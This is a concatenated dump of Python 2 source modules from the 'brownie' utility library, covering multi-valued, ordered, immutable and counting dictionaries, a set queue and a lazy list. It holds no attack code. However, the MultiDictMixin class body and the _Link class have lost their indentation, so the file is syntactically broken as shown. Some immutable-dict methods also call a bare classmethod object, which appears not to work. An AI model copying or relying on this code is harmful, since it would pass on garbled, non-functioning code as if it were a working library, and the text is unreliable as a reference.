        Raises :exc:`ValueError` if `n` is lower than 1.
        """
        if n < 1:
            raise ValueError('n should be greater than 0')
        items = list(self.remaining)[:n]
        # Pull further items from the source and buffer them until we have
        # n of them or the source is exhausted.
        while len(items) < n:
            try:
                item = self.iterator.next()
            except StopIteration:
                break
            items.append(item)
            self.remaining.append(item)
        return items

    def __iter__(self):
        return self

    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self.iterator)
__all__ = ['PeekableIterator']
########NEW FILE########
__FILENAME__ = mappings
# coding: utf-8
"""
brownie.datastructures.mappings
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from heapq import nlargest
from operator import itemgetter
from itertools import izip, repeat, ifilter
from brownie.itools import chain, unique, starmap
from brownie.abstract import AbstractClassMeta
from brownie.datastructures import missing
def iter_multi_items(mapping):
    """
    Iterates over the items of the given `mapping`.
    If a key has multiple values a ``(key, value)`` item is yielded for each::
        >>> for key, value in iter_multi_items({1: [2, 3]}):
        ...     print key, value
        1 2
        1 3
        >>> for key, value in iter_multi_items(MultiDict({1: [2, 3]})):
        ...     print key, value
        1 2
        1 3
    """
    if isinstance(mapping, MultiDict):
        # Bug fix: multi=True is required to yield one pair per *value*;
        # with multi=False MultiDict.iteritems yields only the first value
        # of every key, contradicting the documented behaviour above.
        for item in mapping.iteritems(multi=True):
            yield item
    elif isinstance(mapping, dict):
        for key, value in mapping.iteritems():
            if isinstance(value, (tuple, list)):
                # Expand list/tuple values into one pair per element.
                for value in value:
                    yield key, value
            else:
                yield key, value
    else:
        # Assume an iterable of (key, value) pairs.
        for item in mapping:
            yield item
@classmethod
def raise_immutable(cls, *args, **kwargs):
    # Shared mutator stub: assigned into the immutable dict classes below so
    # that every mutating method raises TypeError with the class's name.
    raise TypeError('%r objects are immutable' % cls.__name__)
class ImmutableDictMixin(object):
    # Mixin that stubs out every mutating dict method with raise_immutable.
    @classmethod
    def fromkeys(cls, keys, value=None):
        return cls(zip(keys, repeat(value)))

    __setitem__ = __delitem__ = setdefault = update = pop = popitem = clear = \
        raise_immutable

    def __repr__(self):
        # Render an empty instance as ClassName() rather than ClassName({}).
        content = dict.__repr__(self) if self else ''
        return '%s(%s)' % (self.__class__.__name__, content)
class ImmutableDict(ImmutableDictMixin, dict):
    """
    An immutable :class:`dict`.

    .. versionadded:: 0.5
       :class:`ImmutableDict` is now hashable, given the content is.
    """
    __metaclass__ = AbstractClassMeta

    def __hash__(self):
        # Hash over the item pairs; raises if any value is unhashable.
        return hash(tuple(self.items()))
class CombinedDictMixin(object):
    # Read-only view over a list of dicts; on lookup the first dict that
    # contains the key wins.
    @classmethod
    def fromkeys(cls, keys, value=None):
        # Bug fix: the old message interpolated cls.__class__.__name__,
        # which is the *metaclass* name, not the class being used.
        raise TypeError('cannot create %r instances with .fromkeys()' %
            cls.__name__
        )

    def __init__(self, dicts=None):
        #: The list of combined dictionaries.
        self.dicts = [] if dicts is None else list(dicts)

    def __getitem__(self, key):
        for d in self.dicts:
            if key in d:
                return d[key]
        raise KeyError(key)

    def get(self, key, default=None):
        try:
            return self[key]
        except KeyError:
            return default

    def __iter__(self):
        # Keys in first-seen order, without duplicates across dicts.
        return unique(chain.from_iterable(d.iterkeys() for d in self.dicts))

    iterkeys = __iter__

    def itervalues(self):
        for key in self:
            yield self[key]

    def iteritems(self):
        for key in self:
            yield key, self[key]

    def keys(self):
        return list(self.iterkeys())

    def values(self):
        return list(self.itervalues())

    def items(self):
        return list(self.iteritems())

    def __len__(self):
        return len(self.keys())

    def __contains__(self, key):
        return any(key in d for d in self.dicts)

    has_key = __contains__

    def __repr__(self):
        content = repr(self.dicts) if self.dicts else ''
        return '%s(%s)' % (self.__class__.__name__, content)
class CombinedDict(CombinedDictMixin, ImmutableDictMixin, dict):
    """
    An immutable :class:`dict` which combines the given `dicts` into one.
    You can use this class to combine dicts of any type, however different
    interfaces as provided by e.g. :class:`MultiDict` or :class:`Counter` are
    not supported, the same goes for additional keyword arguments.

    .. versionadded:: 0.2

    .. versionadded:: 0.5
       :class:`CombinedDict` is now hashable, given the content is.
    """
    __metaclass__ = AbstractClassMeta
    virtual_superclasses = (ImmutableDict, )

    def __hash__(self):
        # Hashes the tuple of member dicts; requires the members themselves
        # to be hashable (e.g. ImmutableDict instances).
        return hash(tuple(self.dicts))
class MultiDictMixin(object):
def __init__(self, *args, **kwargs):
if len(args) > 1:
raise TypeError(
'expected at most 1 argument, got %d' % len(args)
)
arg = []
if args:
mapping = args[0]
if isinstance(mapping, self.__class__):
arg = ((k, l[:]) for k, l in mapping.iterlists())
elif hasattr(mapping, 'iteritems'):
for key, value in mapping.iteritems():
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
arg.append((key, value))
else:
keys = []
tmp = {}
for key, value in mapping or ():
tmp.setdefault(key, []).append(value)
keys.append(key)
arg = ((key, tmp[key]) for key in unique(keys))
kws = {}
for key, value in kwargs.iteritems():
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
kws[key] = value
super(MultiDictMixin, self).__init__(arg, **kws)
def __getitem__(self, key):
"""
Returns the first value associated with the given `key`. If no value
is found a :exc:`KeyError` is raised.
"""
return super(MultiDictMixin, self).__getitem__(key)[0]
def __setitem__(self, key, value):
"""
Sets the values associated with the given `key` to ``[value]``.
"""
super(MultiDictMixin, self).__setitem__(key, [value])
def get(self, key, default=None):
"""
Returns the first value associated with the given `key`, if there are
none the `default` is returned.
"""
try:
return self[key]
except KeyError:
return default
def add(self, key, value):
"""
Adds the `value` for the given `key`.
"""
super(MultiDictMixin, self).setdefault(key, []).append(value)
def getlist(self, key):
"""
Returns the :class:`list` of values for the given `key`. If there are
none an empty :class:`list` is returned.
"""
try:
return super(MultiDictMixin, self).__getitem__(key)
except KeyError:
return []
def setlist(self, key, values):
"""
Sets the values associated with the given `key` to the given `values`.
"""
super(MultiDictMixin, self).__setitem__(key, list(values))
def setdefault(self, key, default=None):
"""
Returns the value for the `key` if it is in the dict, otherwise returns
`default` and sets that value for the `key`.
"""
if key not in self:
MultiDictMixin.__setitem__(self, key, default)
else:
default = MultiDictMixin.__getitem__(self, key)
return default
def setlistdefault(self, key, default_list=None):
"""
Like :meth:`setdefault` but sets multiple values and returns the list
associated with the `key`.
"""
if key not in self:
default_list = list(default_list or (None, ))
MultiDictMixin.setlist(self, key, default_list)
else:
default_list = MultiDictMixin.getlist(self, key)
return default_list
def iteritems(self, multi=False):
"""Like :meth:`items` but returns an iterator."""
for key, values in super(MultiDictMixin, self).iteritems():
if multi:
for value in values:
yield key, value
else:
yield key, values[0]
def items(self, multi=False):
"""
Returns a :class:`list` of ``(key, value)`` pairs.
:param multi:
If ``True`` the returned :class:`list` will contain a pair for
every value associated with a key.
"""
return list(self.iteritems(multi))
    def itervalues(self):
        """Like :meth:`values` but returns an iterator."""
        # yields only the first value of each key
        for values in super(MultiDictMixin, self).itervalues():
            yield values[0]
    def values(self):
        """
        Returns a :class:`list` with the first value of every key.
        """
        return list(self.itervalues())
    def iterlists(self):
        """Like :meth:`lists` but returns an iterator."""
        for key, values in super(MultiDictMixin, self).iteritems():
            # copy the internal list so callers cannot mutate the dict state
            yield key, list(values)
    def lists(self):
        """
        Returns a :class:`list` of ``(key, values)`` pairs, where `values` is
        the list of values associated with the `key`.
        """
        return list(self.iterlists())
    def iterlistvalues(self):
        """Like :meth:`listvalues` but returns an iterator."""
        # NOTE: yields the internal lists directly, they are not copied here
        return super(MultiDictMixin, self).itervalues()
    def listvalues(self):
        """
        Returns a :class:`list` of all values.

        Every item is the :class:`list` of values stored for one key.
        """
        return list(self.iterlistvalues())
    def pop(self, key, default=missing):
        """
        Returns the first value associated with the given `key` and removes
        the item.

        A :exc:`KeyError` is raised for a missing `key` unless a `default`
        is passed.
        """
        # `missing` is a module-level sentinel so that ``None`` remains a
        # legitimate default value.
        value = super(MultiDictMixin, self).pop(key, default)
        if value is missing:
            raise KeyError(key)
        elif value is default:
            # key was absent and a caller-supplied default was used
            return default
        return value[0]
    def popitem(self, *args, **kwargs):
        """
        Returns a key and the first associated value. The item is removed.
        """
        # the remaining values of that key are dropped along with the item
        key, values = super(MultiDictMixin, self).popitem(*args, **kwargs)
        return key, values[0]
    def poplist(self, key):
        """
        Returns the :class:`list` of values associated with the given `key`,
        if the `key` does not exist in the :class:`MultiDict` an empty list is
        returned.

        Never raises; a missing `key` simply yields ``[]``.
        """
        return super(MultiDictMixin, self).pop(key, [])
    def popitemlist(self):
        """Like :meth:`popitem` but returns all associated values."""
        # returns the raw (key, values) pair stored internally
        return super(MultiDictMixin, self).popitem()
    def update(self, *args, **kwargs):
        """
        Extends the dict using the given mapping and/or keyword arguments.

        Unlike :meth:`dict.update` existing values are not replaced; every
        pair is added via :meth:`add`.
        """
        if len(args) > 1:
            raise TypeError(
                'expected at most 1 argument, got %d' % len(args)
            )
        mappings = [args[0] if args else [], kwargs.iteritems()]
        for mapping in mappings:
            # iter_multi_items (module-level helper) flattens multi dicts,
            # plain mappings and (key, value) iterables uniformly
            for key, value in iter_multi_items(mapping):
                MultiDictMixin.add(self, key, value)
class MultiDict(MultiDictMixin, dict):
    """
    A :class:`MultiDict` is a dictionary customized to deal with multiple
    values for the same key.

    Internally the values for each key are stored as a :class:`list`, but the
    standard :class:`dict` methods will only return the first value of those
    :class:`list`\s. If you want to gain access to every value associated with
    a key, you have to use the :class:`list` methods, specific to a
    :class:`MultiDict`.
    """
    __metaclass__ = AbstractClassMeta

    def __repr__(self):
        if not self:
            return '%s()' % self.__class__.__name__
        return '%s(%s)' % (self.__class__.__name__, dict.__repr__(self))
class ImmutableMultiDictMixin(ImmutableDictMixin, MultiDictMixin):
    """
    Combines :class:`ImmutableDictMixin` and :class:`MultiDictMixin` and
    additionally blocks the multi-dict-specific mutating methods.

    The plain :class:`dict` mutators are presumably blocked by
    :class:`ImmutableDictMixin`; only the methods introduced by
    :class:`MultiDictMixin` have to be overridden here.
    """
    def add(self, key, value):
        raise_immutable(self)
    def setlist(self, key, values):
        raise_immutable(self)
    def setlistdefault(self, key, default_list=None):
        raise_immutable(self)
    def poplist(self, key):
        raise_immutable(self)
    def popitemlist(self):
        raise_immutable(self)
class ImmutableMultiDict(ImmutableMultiDictMixin, dict):
    """
    An immutable :class:`MultiDict`.

    .. versionadded:: 0.5
       :class:`ImmutableMultiDict` is now hashable, given the content is.
    """
    __metaclass__ = AbstractClassMeta

    virtual_superclasses = (MultiDict, ImmutableDict)

    def __hash__(self):
        # the value lists are converted to tuples so the items are hashable
        return hash(tuple((key, tuple(value)) for key, value in self.lists()))
class CombinedMultiDict(CombinedDictMixin, ImmutableMultiDictMixin, dict):
    """
    An :class:`ImmutableMultiDict` which combines the given `dicts` into one.

    .. versionadded:: 0.2
    """
    __metaclass__ = AbstractClassMeta

    virtual_superclasses = (ImmutableMultiDict, )

    def getlist(self, key):
        # concatenate the values every combined dict stores for `key`
        values = []
        for mapping in self.dicts:
            values.extend(mapping.getlist(key))
        return values

    def iterlists(self):
        # merge value lists per key, preserving first-seen key order
        collected = OrderedDict()
        for mapping in self.dicts:
            for key, values in mapping.iterlists():
                collected.setdefault(key, []).extend(values)
        return collected.iteritems()

    def iterlistvalues(self):
        for key in self:
            yield self.getlist(key)

    def iteritems(self, multi=False):
        for key in self:
            yield key, (self.getlist(key) if multi else self[key])

    def items(self, multi=False):
        return list(self.iteritems(multi))
class _Link(object):
__slots__ = 'key', 'prev', 'next'
def __init__(self, key=None, prev=None, next=None):
self.key = key
self.prev = prev
self.next = next
def __getstate__(self):
return self.key, self.prev, self.next
def __setstate__(self, state):
self.key, self.prev, self.next = state
class OrderedDict(dict):
    """
    A :class:`dict` which remembers insertion order.

    Big-O times for every operation are equal to the ones :class:`dict` has
    however this comes at the cost of higher memory usage.

    This dictionary is only equal to another dictionary of this type if the
    items on both dictionaries were inserted in the same order.
    """
    @classmethod
    def fromkeys(cls, iterable, value=None):
        """
        Returns a :class:`OrderedDict` with keys from the given `iterable`
        and `value` as value for each item.
        """
        return cls(izip(iterable, repeat(value)))

    def __init__(self, *args, **kwargs):
        if len(args) > 1:
            raise TypeError(
                'expected at most 1 argument, got %d' % len(args)
            )
        # `_root` is the sentinel of a circular doubly linked list which
        # holds the keys in insertion order; `_map` maps each key to its
        # link so unlinking is O(1).
        self._root = _Link()
        self._root.prev = self._root.next = self._root
        self._map = {}
        OrderedDict.update(self, *args, **kwargs)

    def __setitem__(self, key, value):
        """
        Sets the item with the given `key` to the given `value`.
        """
        if key not in self:
            # new key: append its link at the end of the order list
            last = self._root.prev
            link = _Link(key, last, self._root)
            last.next = self._root.prev = self._map[key] = link
        dict.__setitem__(self, key, value)

    def __delitem__(self, key):
        """
        Deletes the item with the given `key`.
        """
        dict.__delitem__(self, key)
        # unlink the key from the order list
        link = self._map.pop(key)
        prev, next = link.prev, link.next
        prev.next, next.prev = link.next, link.prev

    def setdefault(self, key, default=None):
        """
        Returns the value of the item with the given `key`; if no such item
        exists one is created with the `default` value.
        """
        if key not in self:
            OrderedDict.__setitem__(self, key, default)
        return OrderedDict.__getitem__(self, key)

    def pop(self, key, default=missing):
        """
        Deletes the item with the given `key` and returns the value. If the
        item does not exist a :exc:`KeyError` is raised unless `default` is
        given.
        """
        try:
            value = dict.__getitem__(self, key)
            del self[key]
            return value
        except KeyError:
            if default is missing:
                raise
            return default

    def popitem(self, last=True):
        """
        Pops the last or first item from the dict depending on `last`.
        """
        if not self:
            raise KeyError('dict is empty')
        key = (reversed(self) if last else iter(self)).next()
        return key, OrderedDict.pop(self, key)

    def move_to_end(self, key, last=True):
        """
        Moves the item with the given `key` to the end of the dictionary if
        `last` is ``True`` otherwise to the beginning.

        Raises :exc:`KeyError` if no item with the given `key` exists.

        .. versionadded:: 0.4
        """
        if key not in self:
            raise KeyError(key)
        # unlink the key's node...
        link = self._map[key]
        prev, next = link.prev, link.next
        prev.next, next.prev = next, prev
        # ...and splice it back in at the requested end
        if last:
            replacing = self._root.prev
            replacing.next = self._root.prev = link
            link.prev, link.next = replacing, self._root
        else:
            replacing = self._root.next
            self._root.next = replacing.prev = link
            link.prev, link.next = self._root, replacing

    def update(self, *args, **kwargs):
        """
        Updates the dictionary with a mapping and/or from keyword arguments.
        """
        if len(args) > 1:
            raise TypeError(
                'expected at most 1 argument, got %d' % len(args)
            )
        mappings = []
        if args:
            if hasattr(args[0], 'iteritems'):
                mappings.append(args[0].iteritems())
            else:
                mappings.append(args[0])
        mappings.append(kwargs.iteritems())
        for mapping in mappings:
            for key, value in mapping:
                OrderedDict.__setitem__(self, key, value)

    def clear(self):
        """
        Clears the contents of the dict.
        """
        self._root = _Link()
        self._root.prev = self._root.next = self._root
        self._map.clear()
        dict.clear(self)

    def __eq__(self, other):
        """
        Returns ``True`` if this dict is equal to the `other` one. If the
        other one is a :class:`OrderedDict` as well they are only considered
        equal if the insertion order is identical.
        """
        if isinstance(other, self.__class__):
            # izip() stops at the shorter iterable, so without the explicit
            # length comparison a dict would compare equal to any ordered
            # "prefix" of itself.
            return len(self) == len(other) and all(
                i1 == i2 for i1, i2 in izip(self.iteritems(), other.iteritems())
            )
        return dict.__eq__(self, other)

    def __ne__(self, other):
        return not self.__eq__(other)

    def __iter__(self):
        # walk the order list forwards
        curr = self._root.next
        while curr is not self._root:
            yield curr.key
            curr = curr.next

    def __reversed__(self):
        # walk the order list backwards
        curr = self._root.prev
        while curr is not self._root:
            yield curr.key
            curr = curr.prev

    def iterkeys(self):
        """
        Returns an iterator over the keys of all items in insertion order.
        """
        return OrderedDict.__iter__(self)

    def itervalues(self):
        """
        Returns an iterator over the values of all items in insertion order.
        """
        return (dict.__getitem__(self, k) for k in OrderedDict.__iter__(self))

    def iteritems(self):
        """
        Returns an iterator over all the items in insertion order.
        """
        return izip(OrderedDict.iterkeys(self), OrderedDict.itervalues(self))

    def keys(self):
        """
        Returns a :class:`list` over the keys of all items in insertion order.
        """
        return list(OrderedDict.iterkeys(self))

    def values(self):
        """
        Returns a :class:`list` over the values of all items in insertion order.
        """
        return list(OrderedDict.itervalues(self))

    def items(self):
        """
        Returns a :class:`list` over the items in insertion order.
        """
        return zip(OrderedDict.keys(self), OrderedDict.values(self))

    def __repr__(self):
        content = repr(self.items()) if self else ''
        return '%s(%s)' % (self.__class__.__name__, content)
class ImmutableOrderedDict(ImmutableDictMixin, OrderedDict):
    """
    An immutable :class:`OrderedDict`.

    .. versionadded:: 0.2

    .. versionadded:: 0.5
       :class:`ImmutableOrderedDict` is now hashable, given the content is.
    """
    __metaclass__ = AbstractClassMeta

    virtual_superclasses = (ImmutableDict, )

    # OrderedDict.move_to_end mutates the order, so it has to be blocked too
    move_to_end = raise_immutable

    def __hash__(self):
        # items (in insertion order) define the hash, matching __eq__
        return hash(tuple(self.iteritems()))

    # reuse OrderedDict's repr, presumably shadowed otherwise via the MRO
    __repr__ = OrderedDict.__repr__
class OrderedMultiDict(MultiDictMixin, OrderedDict):
    """An ordered :class:`MultiDict`."""
    # behavior comes entirely from the two bases; this class only combines
    # them and registers MultiDict as a virtual superclass
    __metaclass__ = AbstractClassMeta

    virtual_superclasses = (MultiDict, )
class ImmutableOrderedMultiDict(ImmutableMultiDictMixin, ImmutableOrderedDict):
    """An immutable :class:`OrderedMultiDict`."""
    __metaclass__ = AbstractClassMeta

    virtual_superclasses = (ImmutableMultiDict, OrderedMultiDict)

    def __repr__(self):
        if not self:
            return '%s()' % self.__class__.__name__
        return '%s(%s)' % (self.__class__.__name__, repr(self.items()))
class FixedDict(dict):
    """
    A :class:`dict` whose items can only be created or deleted not changed.

    If you attempt to change an item a :exc:`KeyError` is raised.

    .. versionadded:: 0.5
    """
    def __setitem__(self, key, value):
        # re-assigning an existing key is forbidden
        if key in self:
            raise KeyError('already set')
        dict.__setitem__(self, key, value)

    def update(self, *args, **kwargs):
        if len(args) > 1:
            raise TypeError(
                'expected at most 1 argument, got %d' % len(args)
            )
        sources = list(args)
        if sources and hasattr(sources[0], 'iteritems'):
            sources[0] = sources[0].iteritems()
        sources.append(kwargs.iteritems())
        # route every pair through __setitem__ so re-assignments raise
        for source in sources:
            for key, value in source:
                FixedDict.__setitem__(self, key, value)

    def __repr__(self):
        if not self:
            return '%s()' % self.__class__.__name__
        return '%s(%s)' % (self.__class__.__name__, dict.__repr__(self))
class Counter(dict):
    """
    :class:`dict` subclass for counting hashable objects. Elements are stored
    as keys with the values being their respective counts.

    :param countable: An iterable of elements to be counted or a
                      :class:`dict`\-like object mapping elements to their
                      respective counts.

    This object supports several operations returning a new :class:`Counter`
    object from the common elements of `c1` and `c2`, in any case the new
    counter will not contain negative counts.

    +-------------+-----------------------------------------------------+
    | Operation   | Result contains...                                  |
    +=============+=====================================================+
    | ``c1 + c2`` | sums of common element counts.                      |
    +-------------+-----------------------------------------------------+
    | ``c1 - c2`` | difference of common element counts.                |
    +-------------+-----------------------------------------------------+
    | ``c1 | c2`` | maximum of common element counts.                   |
    +-------------+-----------------------------------------------------+
    | ``c1 & c2`` | minimum of common element counts.                   |
    +-------------+-----------------------------------------------------+

    Furthermore it is possible to multiply the counter with an :class:`int` as
    scalar.

    Accessing a non-existing element will always result in an element
    count of 0, accordingly :meth:`get` uses 0 and :meth:`setdefault` uses 1 as
    default value.
    """
    def __init__(self, countable=None, **kwargs):
        self.update(countable, **kwargs)

    def __missing__(self, key):
        # missing elements have a count of 0 instead of raising a KeyError
        return 0

    def get(self, key, default=0):
        return dict.get(self, key, default)

    def setdefault(self, key, default=1):
        return dict.setdefault(self, key, default)

    def most_common(self, n=None):
        """
        Returns a list of all items sorted from the most common to the least.

        :param n: If given only the items of the `n`\-most common elements are
                  returned.

        >>> from brownie.datastructures import Counter
        >>> Counter('Hello, World!').most_common(2)
        [('l', 3), ('o', 2)]
        """
        if n is None:
            return sorted(self.iteritems(), key=itemgetter(1), reverse=True)
        return nlargest(n, self.iteritems(), key=itemgetter(1))

    def elements(self):
        """
        Iterator over the elements in the counter, repeating as many times as
        counted.

        >>> from brownie.datastructures import Counter
        >>> sorted(Counter('abcabc').elements())
        ['a', 'a', 'b', 'b', 'c', 'c']
        """
        return chain(*starmap(repeat, self.iteritems()))

    def update(self, countable=None, **kwargs):
        """
        Updates the counter from the given `countable` and `kwargs`.
        """
        countable = countable or []
        if hasattr(countable, 'iteritems'):
            # dict-like: element -> count
            mappings = [countable.iteritems()]
        else:
            # plain iterable: every occurrence counts once
            mappings = [izip(countable, repeat(1))]
        mappings.append(kwargs.iteritems())
        for mapping in mappings:
            for element, count in mapping:
                self[element] = self.get(element) + count

    def __add__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        result = Counter()
        for element in set(self) | set(other):
            newcount = self[element] + other[element]
            if newcount > 0:
                result[element] = newcount
        return result

    def __sub__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        result = Counter()
        for element in set(self) | set(other):
            newcount = self[element] - other[element]
            if newcount > 0:
                result[element] = newcount
        # BUG FIX: the result was previously never returned, so subtraction
        # always evaluated to None.
        return result

    def __mul__(self, other):
        if not isinstance(other, int):
            return NotImplemented
        result = Counter()
        for element in self:
            newcount = self[element] * other
            if newcount > 0:
                result[element] = newcount
        return result

    def __or__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        result = Counter()
        for element in set(self) | set(other):
            newcount = max(self[element], other[element])
            if newcount > 0:
                result[element] = newcount
        return result

    def __and__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        result = Counter()
        # iterate over the smaller counter, common elements cannot be outside it
        if len(self) < len(other):
            self, other = other, self
        for element in ifilter(self.__contains__, other):
            newcount = min(self[element], other[element])
            if newcount > 0:
                result[element] = newcount
        return result
########NEW FILE########
__FILENAME__ = queues
# coding: utf-8
"""
brownie.datastructures.queues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import Queue as queue
class SetQueue(queue.Queue):
    """Thread-safe implementation of an ordered set queue, which coalesces
    duplicate items into a single item if the older occurrence has not yet been
    read and maintains the order of items in the queue.

    Ordered set queues are useful when implementing data structures like
    event buses or event queues where duplicate events need to be coalesced
    into a single event. An example use case is the inotify API in the Linux
    kernel which shares the same behaviour.

    Queued items must be immutable and hashable so that they can be used as
    dictionary keys or added to sets. Items must have only read-only properties
    and must implement the :meth:`__hash__`, :meth:`__eq__`, and :meth:`__ne__`
    methods to be hashable.

    An example item class implementation follows::

        class QueuedItem(object):
            def __init__(self, a, b):
                self._a = a
                self._b = b

            @property
            def a(self):
                return self._a

            @property
            def b(self):
                return self._b

            def _key(self):
                return (self._a, self._b)

            def __eq__(self, item):
                return self._key() == item._key()

            def __ne__(self, item):
                return self._key() != item._key()

            def __hash__(self):
                return hash(self._key())

    .. NOTE::
        This ordered set queue leverages locking already present in the
        :class:`queue.Queue` class redefining only internal primitives. The
        order of items is maintained because the internal queue is not replaced.
        An internal set is used merely to check for the existence of an item in
        the queue.

    .. versionadded:: 0.3

    :author: Gora Khargosh <gora.khargosh@gmail.com>
    :author: Lukáš Lalinský <lalinsky@gmail.com>
    """
    def _init(self, maxsize):
        queue.Queue._init(self, maxsize)
        # mirrors the queue's content for O(1) duplicate detection
        self._set_of_items = set()

    def _put(self, item):
        # coalesce: drop the item if an unread occurrence is already queued
        if item in self._set_of_items:
            return
        self._set_of_items.add(item)
        queue.Queue._put(self, item)

    def _get(self):
        item = queue.Queue._get(self)
        self._set_of_items.remove(item)
        return item
# public API of this module
__all__ = ['SetQueue']
########NEW FILE########
__FILENAME__ = sequences
# coding: utf-8
"""
brownie.datastructures.sequences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import textwrap
from keyword import iskeyword
from functools import wraps
from itertools import count
from brownie.itools import chain
class LazyList(object):
    """
    Implements a lazy list which computes items based on the given `iterable`.

    This allows you to create :class:`list`\-like objects of unlimited size.
    However although most operations don't exhaust the internal iterator
    completely some of them do, so if the given iterable is of unlimited size
    making such an operation will eventually cause a :exc:`MemoryError`.

    Cost in terms of laziness of supported operators, this does not include
    supported operators without any cost:

    +-----------------+-------------------------------------------------------+
    | Operation       | Result                                                |
    +=================+=======================================================+
    | ``list[i]``     | This exhausts the `list` up until the given index.    |
    +-----------------+                                                       |
    | ``list[i] = x`` |                                                       |
    +-----------------+                                                       |
    | ``del list[i]`` |                                                       |
    +-----------------+-------------------------------------------------------+
    | ``len(list)``   | Exhausts the internal iterator.                       |
    +-----------------+-------------------------------------------------------+
    | ``x in list``   | Exhausts the `list` up until `x` or until the `list`  |
    |                 | is exhausted.                                         |
    +-----------------+-------------------------------------------------------+
    | ``l1 == l2``    | Exhausts both lists.                                  |
    +-----------------+-------------------------------------------------------+
    | ``l1 != l2``    | Exhausts both lists.                                  |
    +-----------------+-------------------------------------------------------+
    | ``bool(list)``  | Exhausts the `list` up to the first item.             |
    +-----------------+-------------------------------------------------------+
    | ``l1 < l2``     | Exhausts the list up to the first item which shows    |
    |                 | the result. In the worst case this exhausts both      |
    +-----------------+ lists.                                                |
    | ``l1 > l2``     |                                                       |
    +-----------------+-------------------------------------------------------+
    | ``l1 + l2``     | Creates a new :class:`LazyList` without exhausting    |
    |                 | `l1` or `l2`.                                         |
    +-----------------+-------------------------------------------------------+
    | ``list * n``    | Exhausts the `list`.                                  |
    +-----------------+                                                       |
    | ``list *= n``   |                                                       |
    +-----------------+-------------------------------------------------------+

    .. versionadded:: 0.5
       It is now possible to pickle :class:`LazyList`\s, however this will
       exhaust the list.
    """
    @classmethod
    def factory(cls, callable):
        """
        Returns a wrapper for a given callable which takes the return value
        of the wrapped callable and converts it into a :class:`LazyList`.
        """
        @wraps(callable)
        def wrap(*args, **kwargs):
            return cls(callable(*args, **kwargs))
        return wrap
    # Class-body decorator: exhausts the list before running the decorated
    # method.  It is deleted from the class namespace at the bottom of the
    # class body, so it never becomes an attribute of instances.
    def exhausting(func):
        @wraps(func)
        def wrap(self, *args, **kwargs):
            self._exhaust()
            return func(self, *args, **kwargs)
        return wrap
    def __init__(self, iterable):
        # Already-materialized sequences need no lazy bookkeeping; note that
        # in this case `_iterator` is never set.
        if isinstance(iterable, (list, tuple, basestring)):
            #: ``True`` if the internal iterator is exhausted.
            self.exhausted = True
            self._collected_data = list(iterable)
        else:
            self._iterator = iter(iterable)
            self.exhausted = False
            self._collected_data = []
    def _exhaust(self, i=None):
        """
        Pulls items from the internal iterator into `_collected_data` until
        index `i` is available; `i` may be ``None`` (exhaust fully), an
        :class:`int` or a :class:`slice`.
        """
        if self.exhausted:
            return
        elif i is None or i < 0:
            # a negative index can only be resolved against the full length
            index_range = count(self.known_length)
        elif isinstance(i, slice):
            # NOTE: under Python 2 ``None < 0`` is True, so open-ended
            # slices also take the full-exhaustion branch here
            start, stop = i.start, i.stop
            if start < 0 or stop < 0:
                index_range = count(self.known_length)
            else:
                index_range = xrange(self.known_length, stop)
        else:
            index_range = xrange(self.known_length, i + 1)
        for i in index_range:
            try:
                self._collected_data.append(self._iterator.next())
            except StopIteration:
                self.exhausted = True
                break
    @property
    def known_length(self):
        """
        The number of items which have been taken from the internal iterator.
        """
        return len(self._collected_data)
    def append(self, object):
        """
        Appends the given `object` to the list.
        """
        self.extend([object])
    def extend(self, objects):
        """
        Extends the list with the given `objects`.
        """
        if self.exhausted:
            self._collected_data.extend(objects)
        else:
            # stay lazy: chain the new objects behind the pending iterator
            self._iterator = chain(self._iterator, objects)
    def insert(self, index, object):
        """
        Inserts the given `object` at the given `index`.

        This method exhausts the internal iterator up until the given `index`.
        """
        self._exhaust(index)
        self._collected_data.insert(index, object)
    def pop(self, index=None):
        """
        Removes and returns the item at the given `index`, if no `index` is
        given the last item is used.

        This method exhausts the internal iterator up until the given `index`.
        """
        # index=None exhausts completely, which the default (last item) needs
        self._exhaust(index)
        if index is None:
            return self._collected_data.pop()
        return self._collected_data.pop(index)
    def remove(self, object):
        """
        Looks for the given `object` in the list and removes the first
        occurrence.

        If the item is not found a :exc:`ValueError` is raised.

        This method exhausts the internal iterator up until the first
        occurrence of the given `object` or entirely if it is not found.
        """
        while True:
            try:
                self._collected_data.remove(object)
                return
            except ValueError:
                if self.exhausted:
                    # nothing left to pull in, the object really is absent
                    raise
                else:
                    # pull in one more item and retry
                    self._exhaust(self.known_length)
    @exhausting
    def reverse(self):
        """
        Reverses the list.

        This method exhausts the internal iterator.
        """
        self._collected_data.reverse()
    @exhausting
    def sort(self, cmp=None, key=None, reverse=False):
        """
        Sorts the list using the given `cmp` or `key` function and reverses it
        if `reverse` is ``True``.

        This method exhausts the internal iterator.
        """
        self._collected_data.sort(cmp=cmp, key=key, reverse=reverse)
    @exhausting
    def count(self, object):
        """
        Counts the occurrences of the given `object` in the list.

        This method exhausts the internal iterator.
        """
        return self._collected_data.count(object)
    def index(self, object):
        """
        Returns first index of the `object` in list

        This method exhausts the internal iterator up until the given `object`.
        """
        for i, obj in enumerate(self):
            if obj == object:
                return i
        raise ValueError('%s not in LazyList' % object)
    def __getitem__(self, i):
        """
        Returns the object or objects at the given index.

        This method exhausts the internal iterator up until the given index.
        """
        self._exhaust(i)
        return self._collected_data[i]
    def __setitem__(self, i, obj):
        """
        Sets the given object or objects at the given index.

        This method exhausts the internal iterator up until the given index.
        """
        self._exhaust(i)
        self._collected_data[i] = obj
    def __delitem__(self, i):
        """
        Removes the item or items at the given index.

        This method exhausts the internal iterator up until the given index.
        """
        self._exhaust(i)
        del self._collected_data[i]
    @exhausting
    def __len__(self):
        """
        Returns the length of the list.

